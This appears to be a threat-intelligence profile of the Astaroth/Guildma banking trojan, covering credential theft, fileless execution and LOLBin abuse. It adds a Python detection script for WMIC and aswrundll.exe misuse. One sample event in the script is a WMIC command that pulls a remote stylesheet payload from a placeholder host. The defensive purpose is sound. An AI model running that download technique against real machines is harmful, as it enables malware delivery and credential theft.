Astaroth is a trojan and information stealer that harvests sensitive data such as user credentials through a keylogger module, interception of operating system calls, and clipboard monitoring. It is used in fileless malware campaigns that run in the memory of infected computers. Astaroth also abuses living-off-the-land binaries (LOLBins) such as the Windows Management Instrumentation Command-line (WMIC) to stealthily download and install malware payloads in the background.
July 2019: Researchers believe the banking trojan called Guildma and Astaroth are the same malware. Both use the Avast binary aswrundll.exe as a LOLBin. Guildma is a complex malware that combines spyware, RAT, password stealer, and banking malware. Until recent reports, the malware appeared to stay within Brazil. Guildma/Astaroth has been observed targeting approximately 130 banks and web services such as Netflix, Amazon, and Google Mail, although it currently does not target computers using the English language. (Avast)
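The two LOLBin behaviours described above (WMIC fetching a remote payload, and the Avast aswrundll.exe binary being run from a location it does not belong in) can be turned into simple process-creation detection heuristics. The following is an added example, not code from the page or from any of the cited vendors; the event format, the sample events and the assumed Avast install directory are all constructed for illustration.

```python
"""Flag process-creation events matching the LOLBin abuse patterns described above."""
import re
from typing import List, Optional, Tuple

# Constructed sample events in a simplified "image path|command line" format.
# These are illustrative, not real telemetry from the campaign.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\wbem\WMIC.exe|wmic os get /format:https://example.invalid/stage.xsl",
    r"C:\Windows\System32\wbem\WMIC.exe|wmic process list brief",
    r"C:\Program Files\Avast Software\Avast\aswRunDll.exe|aswrundll.exe /selfcheck",
    r"C:\Users\Public\aswrundll.exe|aswrundll.exe C:\Users\Public\x.dll",
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Assumed legitimate install directory for the Avast binary (assumption; adjust
# to the paths actually used in your estate).
AVAST_DIR = r"c:\program files\avast software\avast" + "\\"


def classify(event: str) -> Optional[str]:
    """Return a reason string if the event matches a heuristic, else None."""
    image, _, cmdline = event.partition("|")
    image_l = image.lower()
    name = image_l.rsplit("\\", 1)[-1]
    # WMIC is a built-in admin tool; a remote URL on its command line is the
    # download behaviour the text describes and is rare in legitimate use.
    if name == "wmic.exe" and URL_RE.search(cmdline):
        return "wmic.exe referencing a remote URL (possible payload download)"
    # The signed Avast binary is only expected under its own install directory;
    # a copy elsewhere suggests it was dropped to be abused as a LOLBin.
    if name == "aswrundll.exe" and not image_l.startswith(AVAST_DIR):
        return "aswrundll.exe launched outside the Avast install directory"
    return None


def scan(events: List[str]) -> List[Tuple[str, str]]:
    """Return (image path, reason) for every event that trips a heuristic."""
    hits = []
    for event in events:
        reason = classify(event)
        if reason:
            hits.append((event.split("|", 1)[0], reason))
    return hits


if __name__ == "__main__":
    for image, reason in scan(SAMPLE_EVENTS):
        print(f"ALERT {image}: {reason}")
```

Benign WMIC queries and the Avast binary in its normal location produce no alert; only the two suspicious events are flagged.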
September 2019: Astaroth Trojan uses Cloudflare workers to bypass AV software. (Bleeping Computer)
BleepingComputer provides technical details and indicators of compromise on recent Astaroth activity, available here.